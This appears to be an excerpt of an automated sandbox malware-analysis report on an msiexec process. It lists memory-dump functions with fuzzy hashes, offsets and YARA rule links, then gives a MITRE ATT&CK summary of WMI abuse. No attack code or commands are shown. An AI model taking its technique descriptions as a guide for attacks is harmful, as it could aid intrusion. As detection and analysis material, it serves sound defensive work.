Instruction ID: 088c22640436c5199d6ce10701ed0bb0212ba2594a743a2b33fdb3dcccd538b6
Opcode Fuzzy Hash: f10c190961019e7ae142b9564797891daac0556dd1593d6507ffe1b404c8e243
Instruction Fuzzy Hash: 1C520874A40219CFDB58DF24DD88B8DB7B6FB88301F1086A5D80AAB368DB746D85CF51

Function 000E5F38 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9223c19b9a3bbd88e40a7d1c04b8573fc8240919703c1a1618c3507762d9bfc
Instruction ID: d4a5e160cb3f518f656448dda10a420bc4dd01daf96d810369d2af50f0116388
Opcode Fuzzy Hash: e9223c19b9a3bbd88e40a7d1c04b8573fc8240919703c1a1618c3507762d9bfc
Instruction Fuzzy Hash: 3491C0343042908FDB259F66D898B6E7BE2BFD9341F188569E4469B392CB39CC42C791

Function 000E6498 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39cf94bdda90d6b7b83d88d44e0997922a88d9e6f61c7a089c1bca2671a4ccee
Instruction ID: d2090a700ab0aed6f20fe0221d1d162867b384a2b647ab586dd343605473db25
Opcode Fuzzy Hash: 39cf94bdda90d6b7b83d88d44e0997922a88d9e6f61c7a089c1bca2671a4ccee
Instruction Fuzzy Hash: F081AE71B105458FCB68CF6AE488A6DBBF2BF99390B258169D406F7365CB32EC41CB50

Function 000E41A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5528a2e6ec6cf5a73099737123020a1b0ce0f64faaff3870b9dbb66fbe5bf9d
Instruction ID: 6494fb8bc1e88cdda199d1c1b54197b08740e7ae13b6e39787b5c5681a8ff000
Opcode Fuzzy Hash: b5528a2e6ec6cf5a73099737123020a1b0ce0f64faaff3870b9dbb66fbe5bf9d
Instruction Fuzzy Hash: 4451B574E41208CFCB08DFAAD48499DBBF2FF89300B208569E819BB325DB35A941CF50

Function 000E5658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c850ae6f60f8a5a8a70a76bc3b3cd4541b70a266e95a6c740cd52a9e363c1bb5
Instruction ID: a80ce0d972e7d4a431ac60098a9eef2495ced6b4083b0bd0af88efc0c3c28dcd
Opcode Fuzzy Hash: c850ae6f60f8a5a8a70a76bc3b3cd4541b70a266e95a6c740cd52a9e363c1bb5
Instruction Fuzzy Hash: 2831C035344289EFCF159FA5D888AAF7BA6FB88301F104424F90697295CB39DD21DBA0

Function 000E28F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b920d69add73f082d445c5b3d148e32321c0a98285df74766eb35ab7669c608
Instruction ID: 34eb44859e8aa16d0996a1f26473d3aee335c9cc8386c9180df317765d39d503
Opcode Fuzzy Hash: 9b920d69add73f082d445c5b3d148e32321c0a98285df74766eb35ab7669c608
Instruction Fuzzy Hash: A421B031B401549FCB19DB69C4409AE7BE9FF9D360F60C529E809AB245DB30EE42CBD1

Function 000E62F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a13da06167cb4cba30975b5f3466bedc50f2a6104bd8ae2a2f1d8556eeb0a67
Instruction ID: 0f1a916135f7343d2a8dcc7d6cae2f116561952be13eef0c0d4555f17f473b69
Opcode Fuzzy Hash: 5a13da06167cb4cba30975b5f3466bedc50f2a6104bd8ae2a2f1d8556eeb0a67
Instruction Fuzzy Hash: 8D2107353446A18FC7259B3AD45892EBBA2BFD97917144479E806EB395CF32DC02CB90

Function 000E29EC Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ba59982e45a60f31ecfeb7607ce7cfbaf6115013a31165b3751966114fbabb3
Instruction ID: c2c174687d689401a3dbf82f519fc483e8c20528a5664c81086c06d356e00ea1
Opcode Fuzzy Hash: 4ba59982e45a60f31ecfeb7607ce7cfbaf6115013a31165b3751966114fbabb3
Instruction Fuzzy Hash: 9C213631E4839D8FCB05DBB89C104EEFBB4FFDA320B248766E025B3151E63019068BA1

Function 000E5649 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0172cf85f179cc3910b447f4f9d5db421f595997211788e7a397ed0bccaec98a
Instruction ID: de159582c19fb6eb93a6946bf062c2a9311a4e8d8ad2d5ef51d7e576d047dcd9
Opcode Fuzzy Hash: 0172cf85f179cc3910b447f4f9d5db421f595997211788e7a397ed0bccaec98a
Instruction Fuzzy Hash: 16214635748288DFCB159F65D849BAE3BA1EB89316F104429F805DB355C7388E20CB91

Function 000E6300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ba5b2dda3ce3c3553f74c1d9ffee4f762048a0ca327f88321c8ce6b1ba9b611
Instruction ID: 384a33b7181ddc226cf8a3682a3b0dbaf88d6755fb06647f9453eac391dcdb54
Opcode Fuzzy Hash: 5ba5b2dda3ce3c3553f74c1d9ffee4f762048a0ca327f88321c8ce6b1ba9b611
Instruction Fuzzy Hash: 9311A1353446519FC7299A3BD45892EBBA6FFD97A13194478E807EB361CF22DC028B90

Function 000E27F0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aa61d40bcf8a5fc87b1a11bed0f8e2e16cf07272057b37656eb544e16cecf32
Instruction ID: 3d7daefc58b625e5305e2a14c0f0c3596d725c5c3b6aff31d11839034c5c8ecc
Opcode Fuzzy Hash: 8aa61d40bcf8a5fc87b1a11bed0f8e2e16cf07272057b37656eb544e16cecf32
Instruction Fuzzy Hash: CA21C478D4124ACFCB48EFA9D9485EDBFF4BF59300F50466AD849B3224EB345A84CB91

Function 000EF650 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a6e5e70e3aa8c0954eb405a930c673437a32be1be4b66cf667c1950f58f6cc9
Instruction ID: 6353d0a9089dcef4a1b234ba14242f4d4a441b4d00f0f6eaa0a0edb9ee8ce288
Opcode Fuzzy Hash: 8a6e5e70e3aa8c0954eb405a930c673437a32be1be4b66cf667c1950f58f6cc9
Instruction Fuzzy Hash: 65118170D00209CFEB44EFA5C94479EBBF5FB45300F10C6A5D455AB265EB785A45CF81

Function 000BD03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2581158732.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_bd000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12fbbce26f72d6038b7ffe7a8c7a514cff8b31fb1b4a64d3a4d5368661048acf
Instruction ID: 0f9e9ead5d8b87b3fd1666e536f322932aff2dacc03d05081f36404788923adf
Opcode Fuzzy Hash: 12fbbce26f72d6038b7ffe7a8c7a514cff8b31fb1b4a64d3a4d5368661048acf
Instruction Fuzzy Hash: 7311DD75504284DFCB12CF14C9C4B55FFA1FB84314F28CAAAD8494B656C33AD84ACF62

Function 000E5E98 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb429bcc570bc29630cf6b4bb3dd3e00567bd49a3c5ba6ef71e88c6e8e1b0f1b
Instruction ID: cb540a9a6f916a19e645bacdad6d8235c850c210e50ce2b0408f9249f5aac521
Opcode Fuzzy Hash: bb429bcc570bc29630cf6b4bb3dd3e00567bd49a3c5ba6ef71e88c6e8e1b0f1b
Instruction Fuzzy Hash: 12012832700194AFCB258E999C10BFF3BE7EFC9351B148426F505DB245CA35CD2287A0

Function 000E28A1 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50d26fe97ea45225308e38720fd571806b553da3ef71ec8aa485799734a614a0
Instruction ID: 82a842a8b0d27f8d41c6e3391f39b015986a3072679e947568101828575fa38f
Opcode Fuzzy Hash: 50d26fe97ea45225308e38720fd571806b553da3ef71ec8aa485799734a614a0
Instruction Fuzzy Hash: 88E0D835E647668BC702EBB09C500EEBB34BD91321B55855BC02176041E7301658C7A1

Function 000E28B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94427a1e329b1fe56c4aec2632d3c0dc1593476ad01c2d5c3f81ca3e9a779835
Instruction ID: 7575c555999c5751dd42c298764ec0471084e92922679b7c8193e70e1e0ea7b7
Opcode Fuzzy Hash: 94427a1e329b1fe56c4aec2632d3c0dc1593476ad01c2d5c3f81ca3e9a779835
Instruction Fuzzy Hash: B8D01231D6022A978B01AAA5DC044DEBB39FE95721B914666D51437140EB70265986E1

Function 000E6748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3629e2424f44a0377fbd33f29bb460c25dfd399807a6dd07245166080ac7a44
Instruction ID: ce1f38f7780caa6e2b34838d299e5fbe49e6fccb4ea9108c08ac95d39ede6e5f
Opcode Fuzzy Hash: f3629e2424f44a0377fbd33f29bb460c25dfd399807a6dd07245166080ac7a44
Instruction Fuzzy Hash: 40C012311503284BD505F761DC4AB59731EABC1500790CA10A6460555EDEB829994BA1

Function 000E6745 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2581440098.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2be264f1f90eeab7313b841c7431e3cb47e892d9a7abe67e7eefe86918621038
Instruction ID: 7f22ba4172d5796168f576823f3dcf599f4a6925022d40e47842f2b8a4f0b529
Opcode Fuzzy Hash: 2be264f1f90eeab7313b841c7431e3cb47e892d9a7abe67e7eefe86918621038
Instruction Fuzzy Hash: E7D022341803200BD504F760C849A89332BABC0100360CB10A2060454ECEB9098A0B20

Non-executed Functions

Function 24500040 Relevance: 1.8, Strings: 1, Instructions: 596COMMON

Download Yara Rule

Strings

.5q, xrefs: 2450015B

Memory Dump Source

Source File: 00000005.00000002.2604105568.0000000024500000.00000040.00000800.00020000.00000000.sdmp, Offset: 24500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24500000_msiexec.jbxd

Similarity

API ID:
String ID: .5q
API String ID: 0-3553790735
Opcode ID: 5e93a0413ade9f2b2bd13c5a8ab10fd0c9c815b95d77b480c0efd52498ebcb6e
Instruction ID: c5a9bf5ea648058a80ada179ae136e01fcbf4117866ef616fe6627808207d228
Opcode Fuzzy Hash: 5e93a0413ade9f2b2bd13c5a8ab10fd0c9c815b95d77b480c0efd52498ebcb6e
Instruction Fuzzy Hash: D8528974E01228CFDB64DF65D884B9DBBB2BF89300F1085EAD849A7265DB359E81CF50

Function 24500B30 Relevance: .7, Instructions: 709COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2604105568.0000000024500000.00000040.00000800.00020000.00000000.sdmp, Offset: 24500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24500000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa23a9be41d7f55c7fb0561bfb8e9150fba3661e45883586769b41557dacb48f
Instruction ID: e7c0a29c5e9105d69a067747ca6f9c6b1b0fa29889eee020bee20b72e2bdd02d
Opcode Fuzzy Hash: fa23a9be41d7f55c7fb0561bfb8e9150fba3661e45883586769b41557dacb48f
Instruction Fuzzy Hash: 7872CF78E002288FDB65DF69C884BDDBBB2BB89300F1495EAD448A7355DB349E81CF51

Function 2450F810 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2604105568.0000000024500000.00000040.00000800.00020000.00000000.sdmp, Offset: 24500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24500000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6461a0ab356df1543e3a98dd8507b9a217e7e7e1e81c847cd5ee9be39deab2d
Instruction ID: 525c5f16d513adb36e6d06ada11f6f946e8c2210e71c0b142c07c20cbf3cead3
Opcode Fuzzy Hash: c6461a0ab356df1543e3a98dd8507b9a217e7e7e1e81c847cd5ee9be39deab2d
Instruction Fuzzy Hash: CAC1C478E00218CFEB14DFA5C954B9DBBB2BF89300F2091A9D849AB355DB359E85CF50

Function 2450D0F8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2604105568.0000000024500000.00000040.00000800.00020000.00000000.sdmp, Offset: 24500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24500000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 240724c029025102f379aea62e3a075f7798a36a6530a2c4dca9436e93b5fab9
Instruction ID: 931dcb267be757c79a746589a0569668ecd70ad94cdc5a68a48fc9cccaca7b89
Opcode Fuzzy Hash: 240724c029025102f379aea62e3a075f7798a36a6530a2c4dca9436e93b5fab9
Instruction Fuzzy Hash: DCC1B478E00218CFEB14DFA5C954B9DBBB2BF89300F1091A9D849AB355DB359E85CF50

Function 2450CCA0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2604105568.0000000024500000.00000040.00000800.00020000.00000000.sdmp, Offset: 24500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24500000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bb4699616ab4499cfbbdece6cc6f69b03ac57a81917270f46551370991d1082
Instruction ID: ed28589d3cf30fdc736034b630df95139ca924d43f20502f1af65685086f0574
Opcode Fuzzy Hash: 9bb4699616ab4499cfbbdece6cc6f69b03ac57a81917270f46551370991d1082
Instruction Fuzzy Hash: 58C1D378E00218CFEB15DFA5C954B9DBBB2BF89300F2091A9D849AB355DB359E85CF10

Function 2450D550 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2604105568.0000000024500000.00000040.00000800.00020000.00000000.sdmp, Offset: 24500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24500000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08ceef5a1138612f0650040e161ebcb66452b2507b4f0f65c2395b1817cc2860
Instruction ID: 6a95020c32698431421803a3dac9d631c498daf8bffc9183616bff6ca11f7a89
Opcode Fuzzy Hash: 08ceef5a1138612f0650040e161ebcb66452b2507b4f0f65c2395b1817cc2860
Instruction Fuzzy Hash: 56C1C378E00218CFEB54DFA5C954B9DBBB2BF89300F2091A9D849AB355DB359E85CF10

Function 24502968 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2604105568.0000000024500000.00000040.00000800.00020000.00000000.sdmp, Offset: 24500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24500000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 371a249194d169994f3062f5cb3c9118eb22e2fc2b1aed6a9213a6faf144d302
Instruction ID: a939b9649cc1dbacc7ecba1111817ac6b0c012229f595f0e3f8c220ca633c974
Opcode Fuzzy Hash: 371a249194d169994f3062f5cb3c9118eb22e2fc2b1aed6a9213a6faf144d302
Instruction Fuzzy Hash: 92C19178E00218CFEB54DFA5C954B9DBBB2BF89304F1081A9D809AB365DB359E85CF50

Function 2450D9A8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2604105568.0000000024500000.00000040.00000800.00020000.00000000.sdmp, Offset: 24500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24500000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b65ba3859849aa3d9e0995952786c9636b950461f7b5cd9cfb3f5178b231c53b
Instruction ID: c79621f9a9e3ffac177fc2e38ae13aafa93a0ed0bfcad004c09971099b4bc289
Opcode Fuzzy Hash: b65ba3859849aa3d9e0995952786c9636b950461f7b5cd9cfb3f5178b231c53b
Instruction Fuzzy Hash: 8CC1C378E00218CFEB54DFA5C954B9DBBB2BF89300F2091A9D809AB355DB359E85CF50

Function 2450E258 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2604105568.0000000024500000.00000040.00000800.00020000.00000000.sdmp, Offset: 24500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24500000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9602826f7cf70ed3640ae7486ac7d45ff54b52c3715f983343703ef37f94ef7b
Instruction ID: 5ff7d4becc37c520930d24316c7b450ec7ca87f46efa4a8a295407f90af6069c
Opcode Fuzzy Hash: 9602826f7cf70ed3640ae7486ac7d45ff54b52c3715f983343703ef37f94ef7b
Instruction Fuzzy Hash: D7C1B378E00218CFEB14DFA5C954B9DBBB2BF89300F2091A9D849AB355DB359E85CF50

Function 2450DE00 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2604105568.0000000024500000.00000040.00000800.00020000.00000000.sdmp, Offset: 24500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24500000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b61f496594cc776c73bfd72a74d8891d24716e4e2d86ed8dc2a0587df66a56f8
Instruction ID: e865ff64d7c8a0eeb51fb4b09644779d30cb1d5c0f644b337492ace74fbad691
Opcode Fuzzy Hash: b61f496594cc776c73bfd72a74d8891d24716e4e2d86ed8dc2a0587df66a56f8
Instruction Fuzzy Hash: 57C1B478E00218CFEB14DFA5C954B9DBBB2BF89300F2091A9D849AB355DB359E85CF50

Function 2450E6B0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2604105568.0000000024500000.00000040.00000800.00020000.00000000.sdmp, Offset: 24500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24500000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01688ce11f3d0c08cb1516fb205cdcca27c278c6066f66a3b0e8de0c593b561a
Instruction ID: ec802fe904f1905aa67d51e68d738608d9d9f508cb255ec9284f171f6c94bb9e
Opcode Fuzzy Hash: 01688ce11f3d0c08cb1516fb205cdcca27c278c6066f66a3b0e8de0c593b561a
Instruction Fuzzy Hash: FCC1B478E00218CFEB14DFA5C954B9DBBB2BF89300F2091A9D849AB355DB359E85CF50

Function 2450EF60 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2604105568.0000000024500000.00000040.00000800.00020000.00000000.sdmp, Offset: 24500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24500000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f57d2f75d0ecc0aed7e1efae911052c00d9ffce43a08788c0cd54abf89801b88
Instruction ID: 87b7536ec2055eb9d92bdfeaa9cd8276e3f3e1024668e061696be201769cf3b1
Opcode Fuzzy Hash: f57d2f75d0ecc0aed7e1efae911052c00d9ffce43a08788c0cd54abf89801b88
Instruction Fuzzy Hash: 0EC1B378E00218CFEB14DFA5C954B9DBBB2BF89300F2091A9D849AB355DB359E85CF50

Function 2450EB08 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2604105568.0000000024500000.00000040.00000800.00020000.00000000.sdmp, Offset: 24500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24500000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e5913531e0d492559552f887d4468513b914cf97acf43c758705d9e44e4bace
Instruction ID: dae99527f4b324ec92c8c6b06ce5d64f6d66c67cda0dbd56deedffc42616139b
Opcode Fuzzy Hash: 1e5913531e0d492559552f887d4468513b914cf97acf43c758705d9e44e4bace
Instruction Fuzzy Hash: 10C1B378E00218CFEB14DFA5C954B9DBBB2BF89300F2091A9D849AB355DB359E85CF50

Function 2450F3B8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2604105568.0000000024500000.00000040.00000800.00020000.00000000.sdmp, Offset: 24500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24500000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a20c31713cec04c2adebeefa6e69675580391670bcb0aff9ac4dab759b3dc208
Instruction ID: 372913f94924872614148fad9feb03eea5d1e0144a14df4d97ed2a3e29a9a58a
Opcode Fuzzy Hash: a20c31713cec04c2adebeefa6e69675580391670bcb0aff9ac4dab759b3dc208
Instruction Fuzzy Hash: E7C1B578E00218CFEB14DFA5C954B9DBBB2BF89300F2091A9D849AB355DB359E85CF50

Function 24502DC8 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2604105568.0000000024500000.00000040.00000800.00020000.00000000.sdmp, Offset: 24500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24500000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 727176da4319d9c9c427996e1164f5cb8428b1a50517187fbdcf512eeae55d76
Instruction ID: 5fd9ae6d4b228e0c831808d0bb19a522b852db3f2447eae50ce6530f388ad30b
Opcode Fuzzy Hash: 727176da4319d9c9c427996e1164f5cb8428b1a50517187fbdcf512eeae55d76
Instruction Fuzzy Hash: 49A10474D00208CFEB10DFA5D854BDDBBB1FF89304F20926AE449AB2A2DB759985CF54

Function 24502DC4 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2604105568.0000000024500000.00000040.00000800.00020000.00000000.sdmp, Offset: 24500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24500000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8511fc7d4eaa01d9ce9fa802fec00441368df07653e2c19dc56d6ae143503d05
Instruction ID: 521a1e2f5bdc40221b59b6201bc6b6184206cb3222053de87e39176e7d4eb4ae
Opcode Fuzzy Hash: 8511fc7d4eaa01d9ce9fa802fec00441368df07653e2c19dc56d6ae143503d05
Instruction Fuzzy Hash: BBA1F374E002088FEB14DFA5D854BDDBBB1FF89300F209269E449AB2A2DB759984CF54

Function 2450310E Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2604105568.0000000024500000.00000040.00000800.00020000.00000000.sdmp, Offset: 24500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24500000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d21b8e6f6b6438cd703d0fb92d3cc8a44f0e235d91521d9b4fa536b47dbb55a
Instruction ID: 82bda45a8e9daeec2e53512471184c253776a3ddd4b7529551d75a5c3c746662
Opcode Fuzzy Hash: 3d21b8e6f6b6438cd703d0fb92d3cc8a44f0e235d91521d9b4fa536b47dbb55a
Instruction Fuzzy Hash: 1D91E374E00208CFEB10DFA5D854BDDBBB1FF89310F209299E449AB2A2DB759985CF14

Function 24500673 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2604105568.0000000024500000.00000040.00000800.00020000.00000000.sdmp, Offset: 24500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24500000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eab6fd56f4efcee85681015904b9b9dc5f65298268eb1a7b1fdd3c6be321cbec
Instruction ID: 21ed0ebb01a845d112ff46c072d34c1e05f397a1ec5a29e7fe1cd145b4b2906d
Opcode Fuzzy Hash: eab6fd56f4efcee85681015904b9b9dc5f65298268eb1a7b1fdd3c6be321cbec
Instruction Fuzzy Hash: 4AA1AE74A01228CFDB64DF25C854B9ABBB2BF8A300F1085EAD84DA7351DB359E81CF51

Function 24500853 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2604105568.0000000024500000.00000040.00000800.00020000.00000000.sdmp, Offset: 24500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_24500000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6788c5ed10414a4f328fad813724c84505c1fc4c03b554000b0f7da6b8ff8f7
Instruction ID: 02c0f422937701dc416e19a2971d005d2ab61bc79accb6db14515192488ea455
Opcode Fuzzy Hash: b6788c5ed10414a4f328fad813724c84505c1fc4c03b554000b0f7da6b8ff8f7
Instruction Fuzzy Hash: B5518274A41228CFCB69DF25C854B9ABBB2FF4A301F5095E9D80AA7354CB359E81CF50

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

